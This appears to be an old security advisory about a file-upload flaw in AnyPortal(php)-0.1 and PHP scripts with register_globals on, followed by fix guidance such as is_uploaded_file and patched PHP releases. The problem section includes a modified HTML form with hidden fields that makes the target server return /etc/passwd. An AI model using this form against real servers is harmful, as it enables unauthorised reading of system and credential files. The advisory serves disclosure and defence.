COMMAND
AnyPortal(php)-0.1
SYSTEMS AFFECTED
AnyPortal(php)-0.1
PROBLEM
'zorgon' found following. Secure Reality Pty Ltd. has published
the Security Advisory #1 (SRADV00001):
http://oliver.efri.hr/~crv/security/bugs/Others/php2.html
'zorgon' reproduced this vulnerability with AnyPortal(php)-0.1.
It is supposed that AnyPortal is installed by defaut.
Create a file on your local computer called upload.html (if you
want) with the source code of this page:
http://www.victim.com/siteman000510/siteman.php3?A=U&D=
Modify this part of code::
<FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
By:
<FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="http://www.victim.com/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
<INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"></P>
<INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd">
Also, you can retrieve the passwd file on the web server.
The problem is not in the source code of PHP, and is thus not
related to any particular version of PHP; However, many PHP
scripts may suffer from it, because there was no standard, easy
way of testing whether a certain file is indeed a temporary
uploaded file, or any other file on the system. This means that
the previous posts on Bugtraq were not accurate - there's no way
to make a patch for PHP that prevents scripts from being
vulnerable to this exploit, the logic in the scripts themselves
has to be modified.
Note that prior to PHP 4.0, there is no way to turn
'register_globals' off, thus eliminating the ability of remote
attackers to define variables in PHP's global scope (it's possible
to prevent PHP 3.0 from processing HTTP variables completely by
setting gpc_order to "" in php.ini, but there's no convenient way
to access HTTP data that way).
SOLUTION
PHP supports RFC 1867 based file uploads. PHP saves uploaded
files in a temporary directory on the server, using a temporary
name. This temporary name is exposed to the PHP script as $FOO,
where "FOO" is the name of the file input tag in the submitted
form. Many PHP scripts process $FOO without taking measures to
ensure that it is in fact a file that resides in a temporary
directory. It's possible for a remote attacker to supply
arbitrary file names as values for FOO, by submitting a standard
form input tag by that name, and thus cause the PHP script to
process arbitrary files.
Never trust any input that may be coming from the remote user.
Always test whether the variable you expect to contain the path
of an upload file, actually contains a file path of a temporary
file in the system. It is strongly recommended to turn
register_globals off if possible. If register_globals is off, you
can safely check $HTTP_POST_VARS[] for information about the
upload files (see below). If register_globals is kept on, one
must realize that any variable in the global scope might be
overwritten by remote user input.
New versions of PHP have been packaged (4.0.3RC1 and 3.0.17RC1),
to make it easier to secure scripts from this vulnerability.
They include a new function that make it easy to determine
whether a certain filename is a temporary uploaded file or not:
/* Test whether a file is an uploaded file or not */
is_uploaded_file($path);
PHP 4.0.3 also features a new convenience function:
/* Move an uploaded file to a new location. If the file is not
* a valid upload file, no action will take place.
*/
move_uploaded_file($path, $new_path);
In addition, as of PHP 4.0.3, it's safe to use
$HTTP_POST_FILES["FOO"]["tmp_name"] - which cannot be written to
by any remote user input, even when register_globals is on. The
new versions are currently in testing, and thus have the RC tag.
PHP 4.0.3RC1:
http://www.php.net/do_download.php?download_file=php-4.0.3RC1.tar.gz
PHP 3.0.17RC1 (upgrading to PHP 4.0 is strongly recommended):
http://www.php.net/distributions/php-3.0.17RC1.tar.gz